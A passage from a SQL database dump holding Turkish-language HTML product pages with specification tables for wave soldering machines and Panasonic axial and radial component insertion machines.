30px;\">\r\n<td>Soğutma B&ouml;lge Sayısı</td>\r\n<td >1 Kabin (1Fan)</td>\r\n</tr>\r\n<tr >\r\n<td >Nitrojen</td>\r\n<td >Opsiyon</td>\r\n</tr>\r\n<tr >\r\n<td >Maksimum G&uuml;&ccedil;</td>\r\n<td >5.5kW</td>\r\n</tr>\r\n<tr >\r\n<td >G&uuml;&ccedil; Kaynağı</td>\r\n<td>1 ? 220VAC</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Makine Boyutları</td>\r\n<td>990mm x 813mm x 483mm</td>\r\n</tr>\r\n<tr>\r\n<td >&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>','GF-12-HC/HT','','','','gf-12-hc-ht'),(15,'Dalga-Lehim Makinesi','<h2 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">TOLO MI-300 DALGA LEHIM MAKİNESİ</h2>\r\n<p><span style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; text-align: start;\"></span><img src=\"images/urunler/t_mi300.jpg\" alt=\"\" style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; text-align: start;\" border=\"0\" /></p>\r\n<ul style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\r\n<li>\r\n<p><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Kurşunsuz Lehimleye uygun dizayn&nbsp;</strong></span></span></p>\r\n</li>\r\n<li>\r\n<p><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Japon yapımı Mitsubishi PLC Kontrol&nbsp;</strong></span></span></p>\r\n</li>\r\n<li>\r\n<p><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Masa &Uuml;st&uuml; dizaynı ile k&uuml;&ccedil;&uuml;k &uuml;retimlere ve esnek &uuml;retim yapısına uygun, bakım ve temizlik avantajı sunan&nbsp;</strong></span><span style=\"font-size: 10pt;\"><strong>yapısı&nbsp;</strong></span></span></p>\r\n</li>\r\n<li>\r\n<p><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>İşitsel ve g&ouml;rsel uyarı emniyet fren sistemi&nbsp;</strong></span></span></p>\r\n</li>\r\n<li>\r\n<p><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Enerji tasarrufu sağlayan yapısı</strong></span></span></p>\r\n</li>\r\n</ul>\r\n<p><span style=\"text-align: left;\"></span></p>\r\n<table border=\"0\" style=\"margin-left: 30px;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Model İsmi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">TOLO MI-300</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Kontrol Metodu</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">PLC, IR PID Kontrol</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Konvey&ouml;r Motoru</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">1P AC220V 60W</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Lehimleme Isısı</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">\r\n<div style=\"margin-left: 30px;\">300&deg;C, 12KW</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Dalga Y&uuml;ksekliği</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">0-12 mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Dalga Motoru</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">1P AC220V 90W</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Tırnak Temizleme Pompası</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">1P AC220V&nbsp;&nbsp;6W</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Lehim Kapasitesi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">214kg</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Flux Sistemi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">K&ouml;p&uuml;k (Foam)</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">&Ouml;n Isıtıcı Sıcaklığı</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">\r\n<div style=\"margin-left: 30px;\">110-150&deg;C</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">&Ouml;n Isıtıcı Uzunluğu&nbsp;</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">1x800 mm&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Soğutma Tipi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">Hava Soğutmalı</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Konvey&ouml;r Y&uuml;ksekliği</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">360+/-10mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Konvey&ouml;r A&ccedil;ısı</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">\r\n<div style=\"margin-left: 30px;\">4 - 6&deg;</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">G&uuml;&ccedil; Kesilme Emniyeti</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">Konvey&ouml;r ve Bilgisayar i&ccedil;in kesintisiz g&uuml;&ccedil; kaynağı</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">PCB Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">50 - 300 mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">PCB Transfer Y&ouml;n&uuml;</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">L-&gt;R&nbsp;&nbsp;&nbsp;/ (R-&gt;L )</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Konvey&ouml;r Hızı</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">300-900 mm/dk.&nbsp;&nbsp;(Panasonic Hız Kontrol&uuml;)</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">G&uuml;&ccedil; Kaynağı</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">3P AC380V 50HZ</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Başlangı&ccedil; /&Ccedil;alışma G&uuml;c&uuml;</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">13KW / 3.5KW</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Boyutları</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">2570(L) X 1000 (W) X 845(H) mm</td>\r\n</tr>\r\n</tbody>\r\n</table>','MI-300','','','','mi-300'),(16,'Dalga-Lehim (Masaüstü)','<h2 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">LFS 1&nbsp;MASA&Uuml;ST&Uuml; DALGA LEHIM MAKİNESİ</h2>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/global/LFS 1 Photo.gif\" alt=\"\" /></p>\r\n<ul style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Kurşunsuz &uuml;retime uygun&nbsp;titanyum pota</strong></span></span></li>\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Titanyum tırnaklı palet sistemi</strong></span></span></li>\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>T&uuml;m lehimleme parametreleri kolaylıkla kontrol edilebilir</strong></span></span></li>\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Y&uuml;ksek kaliteli ısıtıcı elemanları ile kararlı ve g&uuml;venilir makine performansı&nbsp;</strong></span></span></li>\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>T&uuml;m lehimleme ihtiya&ccedil;larınızı karşılayan performans&nbsp;</strong></span></span></li>\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>Uygun fiyat&nbsp;</strong></span></span></li>\r\n<li><span style=\"font-size: 14pt;\"><span style=\"font-size: 10pt;\"><strong>K&uuml;&ccedil;&uuml;k boyutlar ve d&uuml;ş&uuml;k enerji t&uuml;ketimi</strong></span></span></li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"0\" style=\"margin-left: 30px;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Model İsmi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">LFS 1</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Kontrol Metodu</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">Dijital Kontrol</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">&Ccedil;alışma Sıcaklığı</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">\r\n<div style=\"margin-left: 30px;\">200~350&deg;C</div>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Dalga Y&uuml;ksekliği</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">5-15 mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Lehim Kapasitesi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">55kg</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Flux Sistemi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">K&ouml;p&uuml;k (Foam) - 3lt</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">&Ouml;n Isıtıcı Tipi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">Infrared</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">&Ouml;n Isıtıcı Zamanlaması</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">600 sn kadar ayarlanabilir</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Maksimum PCB Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">200x270 mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Pota Tipi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">Dalgalı Titanyum Pota</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Pota Erime S&uuml;resi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">45&nbsp;Dakika</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Taşıyıcı Tipi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">Titanyum Tırnaklı Palet</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Konvey&ouml;r Hızı</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">0.5-2 m/dk.&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">\r\n<div style=\"margin-left: 30px; text-align: left;\">G&uuml;&ccedil; Kaynağı</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">AC 220V 50HZ</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Maksimum&nbsp;G&uuml;&ccedil; T&uuml;ketimi</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">5.0kW</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">\r\n<div style=\"margin-left: 30px;\">Boyutları</div>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">1230 x&nbsp;560&nbsp;x&nbsp;400 mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"200\" height=\"17\">Ağırlık</td>\r\n<td style=\"margin-left: 30px;\" width=\"354\">95kg (lehim hari&ccedil;)</td>\r\n</tr>\r\n</tbody>\r\n</table>','LFS-1','','','','lfs-1'),(17,'Aksiyel Dizgi','<h2 style=\"text-align: left;\">Panasonic Aksiyel Dizgi Makinesi - AVB</h2>\r\n<h2 style=\"text-align: left;\"><img src=\"images/2el/avb.jpg\" alt=\"\" width=\"300\" border=\"0\" /></h2>\r\n<h2>&nbsp;</h2>\r\n<h3 style=\"text-align: left;\">Genel &Ouml;zellikler</h3>\r\n<ul>\r\n<li style=\"text-align: left;\">Aksiyel bacaklı malzemeleri istenilen bacak aralığı ve y&uuml;kseklikte dizer</li>\r\n<li style=\"text-align: left;\">Delik pozisyonlarının kamera sistemi ile doğrulanması yapılır</li>\r\n<li style=\"text-align: left;\">5mm kalınlık ve 20mm\'nin &uuml;zerinde g&ouml;ve uzunluğuna sahip malzemeler dizebilir</li>\r\n<li style=\"text-align: left;\">26 veya 52mm lik şeritler doğrudan makineye bağlanabilir.</li>\r\n<li style=\"text-align: left;\">Auto Recovery fonksiyonu ile hatalı dizilen malzemenin pozisyonu kamera ile kontrol edilip yeniden dizilir. B&ouml;ylece kesintisiz &uuml;retim ve daha az duruş zamanı sağlanır.</li>\r\n<li style=\"text-align: left;\">Kısa devre teli dizmek i&ccedil;in &ouml;zel besleyici &uuml;nitesi</li>\r\n</ul>\r\n<div>\r\n<div>&nbsp;</div>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/avb-arka.jpg\" alt=\"\" width=\"200\" style=\"font-size: 10px;\" border=\"0\" /></td>\r\n<td><img src=\"images/2el/avb-head.jpg\" alt=\"\" width=\"100\" style=\"font-size: 10px;\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"images/2el/avb-feeder.jpg\" alt=\"\" width=\"200\" border=\"0\" /></td>\r\n<td><img src=\"images/2el/avb-monitor.jpg\" alt=\"\" width=\"100\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><img src=\"images/2el/avb-komp.jpg\" alt=\"\" width=\"300\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">Makine İsmi</td>\r\n<td>PANASONIC AVB</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Model İsmi</td>\r\n<td>NM-2011B</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Delik Doğrulama Sistemi</td>\r\n<td>Kamera ile tanıma</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">PCB Boyutları</td>\r\n<td>Kart Boyutları</td>\r\n<td>\r\n<div>508x381mm (max.) </div>\r\n<div>90x &nbsp;60mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Boyutları</td>\r\n<td>508x371mm (max.)</td>\r\n</tr>\r\n<tr>\r\n<td>Kart Kalınlığı</td>\r\n<td>1.6 &plusmn;0.15 mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Delik &Ccedil;apı (mm)</td>\r\n<td>1&nbsp;&plusmn;0.05</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Yerleştirme Y&ouml;n&uuml;</td>\r\n<td>2 Y&ouml;nl&uuml; 0&deg;, 90&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Giriş (Feeder) Sayısı</td>\r\n<td>\r\n<div>48+Jumper Wire (26mm şerit)</div>\r\n<div>24+Jumper Wire (52mm şerit)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Hızı (sn/malzeme)</td>\r\n<td>\r\n<div>0.48 sn/malzeme (26mm şerit)</div>\r\n<div>0.68 sn/malzeme (52mm şerit)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Maksimum Malzeme Y&uuml;ksekliği (mm)</td>\r\n<td>0 - 5mm arası ayarlanabilir</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Bacak Aralığı (mm)</td>\r\n<td>5 - 26mm arası ayarlanabilir</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">\r\n<p>Kesme ve</p>\r\n<p>Per&ccedil;inlemeMetodu</p>\r\n</td>\r\n<td width=\"83\" height=\"25\">Per&ccedil;inleme BacakUzunlu&Auml;u</td>\r\n<td>1.5&nbsp;&plusmn;0.3 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Per&ccedil;inleme A&ccedil;ısı</td>\r\n<td>~15&deg;</td>\r\n</tr>\r\n<tr>\r\n<td>B&uuml;kme A&ccedil;ısı</td>\r\n<td>~35&deg;&nbsp;veya 45&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Kontrol Sistemi</td>\r\n<td>Panadac 783A controller; DC servomotorlu yarı&nbsp;kapalı &ccedil;evrim kontrol, CRT monit&ouml;r</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Hava Beslemesi ve T&uuml;ketimi</td>\r\n<td>5kg/cm2, 80N&acirc;/dak</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">G&uuml;&ccedil; Beslemesi</td>\r\n<td>AC 3-faz380V 50 Hz</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">&Ccedil;alışma g&uuml;c&uuml;</td>\r\n<td>5.7KVA</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Makine Boyutları (Boy x En x Y&uuml;kseklik)</td>\r\n<td>5900 x 1750 x 1460mm</td>\r\n</tr>\r\n<tr>\r\n<td>Ağırlık</td>\r\n<td>2250kg</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<h2>Dizilebilir Komponentler</h2>\r\n<h2>(26mm veya 52mm genişliğinde şerit &uuml;zerimde)</h2>\r\n<h2>&nbsp;</h2>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Karbon Diren&ccedil;ler</li>\r\n<li style=\"text-align: left;\">Silindirik seramik kapasiteler</li>\r\n<li style=\"text-align: left;\">Diyotlar</li>\r\n<li style=\"text-align: left;\">G&uuml;&ccedil; diren&ccedil;leri, vs</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n</div>','AVB','','','','avb'),(18,'Aksiyel Dizgi','<h2 style=\"text-align: left;\">Panasonic Axial Insertion Machine - AVF</h2>\r\n<h2 style=\"text-align: left;\"><img src=\"images/2el/avb.jpg\" alt=\"\" width=\"300\" border=\"0\" /></h2>\r\n<h2>&nbsp;</h2>\r\n<h3 style=\"text-align: left;\">Genel &Ouml;zellikler</h3>\r\n<ul>\r\n<li style=\"text-align: left;\">Aksiyel bacaklı malzemeleri istenilen bacak aralığı ve y&uuml;kseklikte dizer</li>\r\n<li style=\"text-align: left;\">Delik pozisyonlarının kamera sistemi ile doğrulanması yapılır</li>\r\n<li style=\"text-align: left;\">5mm kalınlık ve 20mm\'nin &uuml;zerinde g&ouml;ve uzunluğuna sahip malzemeler dizebilir</li>\r\n<li style=\"text-align: left;\">26 veya 52mm lik şeritler doğrudan makineye bağlanabilir.</li>\r\n<li style=\"text-align: left;\">Auto Recovery fonksiyonu ile hatalı dizilen malzemenin pozisyonu kamera ile kontrol edilip yeniden dizilir. B&ouml;ylece kesintisiz &uuml;retim ve daha az duruş zamanı sağlanır.</li>\r\n<li style=\"text-align: left;\">Kısa devre teli dizmek i&ccedil;in &ouml;zel besleyici &uuml;nitesi</li>\r\n</ul>\r\n<div>\r\n<div>&nbsp;</div>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/avb-arka.jpg\" alt=\"\" width=\"200\" style=\"font-size: 10px;\" border=\"0\" /></td>\r\n<td><img src=\"images/2el/avb-head.jpg\" alt=\"\" width=\"100\" style=\"font-size: 10px;\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"images/2el/avb-feeder.jpg\" alt=\"\" width=\"200\" border=\"0\" /></td>\r\n<td><img src=\"images/2el/avb-monitor.jpg\" alt=\"\" width=\"100\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><img src=\"images/2el/avb-komp.jpg\" alt=\"\" width=\"300\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">Makine İsmi</td>\r\n<td>PANASONIC AVF</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Model İsmi</td>\r\n<td>NM-2011F</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Delik Doğrulama Sistemi</td>\r\n<td>Kamera ile tanıma</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">PCB Boyutları</td>\r\n<td>Kart Boyutları</td>\r\n<td>\r\n<div>508x381mm (max.) </div>\r\n<div>90x &nbsp;60mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Boyutları</td>\r\n<td>508x371mm (max.)</td>\r\n</tr>\r\n<tr>\r\n<td>Kart Kalınlığı</td>\r\n<td>1.6 &plusmn;0.15 mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Delik &Ccedil;apı (mm)</td>\r\n<td>1&nbsp;&plusmn;0.05</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Yerleştirme Y&ouml;n&uuml;</td>\r\n<td>2 Y&ouml;nl&uuml; 0&deg;, 90&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Giriş (Feeder) Sayısı</td>\r\n<td>\r\n<div>48+Jumper Wire (26mm şerit)</div>\r\n<div>24+Jumper Wire (52mm şerit)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Hızı (sn/malzeme)</td>\r\n<td>\r\n<div>0.48 sn/malzeme (26mm şerit)</div>\r\n<div>0.68 sn/malzeme (52mm şerit)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Maksimum Malzeme Y&uuml;ksekliği (mm)</td>\r\n<td>0 - 5mm arası ayarlanabilir</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Bacak Aralığı (mm)</td>\r\n<td>5 - 26mm arası ayarlanabilir</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">\r\n<p>Kesme ve</p>\r\n<p>Per&ccedil;inlemeMetodu</p>\r\n</td>\r\n<td width=\"83\" height=\"25\">Per&ccedil;inleme BacakUzunlu&Auml;u</td>\r\n<td>1.5&nbsp;&plusmn;0.3 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Per&ccedil;inleme A&ccedil;ısı</td>\r\n<td>~15&deg;</td>\r\n</tr>\r\n<tr>\r\n<td>B&uuml;kme A&ccedil;ısı</td>\r\n<td>~35&deg;&nbsp;veya 45&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Kontrol Sistemi</td>\r\n<td>Panadac 783A controller; DC servomotorlu yarı&nbsp;kapalı &ccedil;evrim kontrol, CRT monit&ouml;r</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Hava Beslemesi ve T&uuml;ketimi</td>\r\n<td>5kg/cm2, 80N&acirc;/dak</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">G&uuml;&ccedil; Beslemesi</td>\r\n<td>AC 3-faz380V 50 Hz</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">&Ccedil;alışma g&uuml;c&uuml;</td>\r\n<td>5.7KVA</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Makine Boyutları (Boy x En x Y&uuml;kseklik)</td>\r\n<td>5900 x 1750 x 1460mm</td>\r\n</tr>\r\n<tr>\r\n<td>Ağırlık</td>\r\n<td>2250kg</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<h2>Dizilebilir Komponentler</h2>\r\n<h2>(26mm veya 52mm genişliğinde şerit &uuml;zerimde)</h2>\r\n<h2>&nbsp;</h2>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Karbon Diren&ccedil;ler</li>\r\n<li style=\"text-align: left;\">Silindirik seramik kapasiteler</li>\r\n<li style=\"text-align: left;\">Diyotlar</li>\r\n<li style=\"text-align: left;\">G&uuml;&ccedil; diren&ccedil;leri, vs</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n</div>','AVF','','','','avf'),(19,'Radyal Dizgi','<h2 style=\"text-align: left;\">Panasonic Radyal Dizgi - RH6</h2>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/2el/rh6.jpg\" alt=\"\" width=\"300\" border=\"0\" /></td>\r\n<td style=\"font-size: 10px;\"><img src=\"images/2el/rh6-arka.jpg\" alt=\"\" width=\"250\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3 style=\"text-align: left;\">Genel &Ouml;zellikler</h3>\r\n<ul>\r\n<li style=\"text-align: left;\">40 farklı &ccedil;eşit radyal malzeme tek bir makine ile dizilebilir.</li>\r\n<li style=\"text-align: left;\">Malzeme dizgisi iki y&ouml;nde (0&deg;, 90&deg;)</li>\r\n<li style=\"text-align: left;\">Yaklaşık 0.6 saniye/malzeme dizgi hızı</li>\r\n</ul>\r\n<div class=\"O\" style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\r\n<div style=\"text-align: left;\"><img src=\"images/2el/rh6-komp.jpg\" alt=\"\" width=\"250\" /></div>\r\n</div>\r\n<div>\r\n<ul>\r\n<li style=\"text-align: left;\">V cut metodu k&uuml;&ccedil;&uuml;k &ccedil;aplı deliklerde dahi daha kararlı bir dizgi sağlar</li>\r\n<li style=\"text-align: left;\">\r\n<div>Hatalı dizilen malzemenin tekrar dizilebilmesi i&ccedil;in hatalı malzemeyi &ccedil;ıkartmak yeterlidir</div>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<div>Y&uuml;ksek g&uuml;venilirlikli malzeme kasetleriyle kararlı bir malzeme beslemesi sağlar ve malzeme 